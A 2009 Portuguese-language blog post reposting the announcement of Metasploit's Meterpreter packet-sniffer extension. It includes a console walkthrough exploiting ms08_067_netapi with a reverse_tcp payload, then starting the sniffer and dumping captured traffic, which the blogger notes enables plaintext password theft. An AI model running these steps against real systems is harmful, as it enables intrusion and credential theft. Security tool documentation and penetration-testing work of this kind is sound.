segunda-feira, 13 de julho de 2009

Metasploit - Meterpreter Sniffer module

Adicionaram uma função fantastica para o meterpreter do metasploit =)! Com certeza isso da um potencial imenso para roubo de senhas plain-text e valoriza ainda mais o uso de criptografia em todos os protocolos https, imaps, pop3s, ssh e demais necessidade .


I committed a test version of the sniffer extension to the SVN trunk. The module in SVN is compiled with debug support, so you should see lots of verbose debug prints if you attach a debugger to the process where meterpreter is running. I could use some help testing this new extension; so far it looks like there are some cases where the "use sniffer" command fails (exploiting ms03-026 on win2003 sp0), but there may be others as well.


To obtain the latest version of Metasploit on UNIX platforms:
$ svn co https://metasploit.com/svn/framework3/trunk/

To obtain the latest version of Metasploit on Windows:
1. Download https://metasploit.com/framework-3.3-dev.exe
2. Execute this and extract the framework to a directory
3. Inside the extracted directory execute msfupdate.bat
4. Inside the extracted directory execute msfconsole.bat

This module uses the MicroOLAP (commercial) Packet Sniffer SDK (we have a license), it can sniff packets from the target system without writing to the filesystem or installing any drivers. The module automatically excludes its own control traffic from the packet capture. As of this week, all Meterpeter communication is now protected by TLS/SSL, including the packet sniffer data.

To get started with the new module:

msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpeter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.0.139
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.120
msf exploit(ms08_067_netapi) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Triggering the vulnerability...
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (205824 bytes)
[*] Meterpreter session 1 opened (192.168.0.139:4444 -> 192.168.0.120:1687)

meterpreter > use sniffer
Loading extension sniffer...success.

meterpreter > help
[snip]
Sniffer Commands
================

Command Description
------- -----------
sniffer_dump Retrieve captured packet data
sniffer_interfaces List all remote sniffable interfaces
sniffer_start Capture packets on a previously opened interface
sniffer_stats View statistics of an active capture
sniffer_stop Stop packet captures on the specified interface

meterpreter > sniffer_interfaces

1 - 'VMware Accelerated AMD PCNet Adapter' ( type:0 mtu:1514 usable:true dhcp:true wifi:false )

meterpreter > sniffer_start 1
[*] Capture started on interface 1 (200000 packet buffer)

meterpreter > sniffer_dump 1 /tmp/all.cap
[*] Dumping packets from interface 1...
[*] Wrote 6 packets to PCAP file /tmp/all.cap

meterpreter > sniffer_dump 1 /tmp/all.cap
[*] Dumping packets from interface 1...
[*] Wrote 31 packets to PCAP file /tmp/all.cap

The sniffer_dump command will append to an existing PCAP or create a new one.

-HD


Cuidado com suas senhas trafegas em plain-text =)!

Happy Hacking!

Rodrigo Montoro(Sp0oKeR)

Um comentário:

spettro disse...

Definitivamente um módulo muito útil :D